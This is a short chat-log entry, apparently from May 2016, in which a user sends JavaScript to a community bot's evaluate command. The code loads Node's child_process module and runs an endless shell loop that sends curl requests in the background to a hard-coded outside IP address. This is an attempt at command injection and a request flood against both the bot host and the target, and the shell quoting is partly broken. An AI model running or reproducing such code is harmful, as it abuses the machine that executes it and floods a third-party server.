Sean Wei says to SITCON BOT Testpool/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'initdate=date '+%s%N' | cut -b1-13; c=0; while true; do i=$(($c + 1)); s=$((date '+%s%N' | cut -b1-13 - $initdate));curl "http://1.34.37.206/$s?c=$s" &; done'; exec(cmd, function(error, stdout, stderr) { console.log(error) console.log(stdout) console.log(stderr) });});at Sun, May 8, 2016 4:58 PM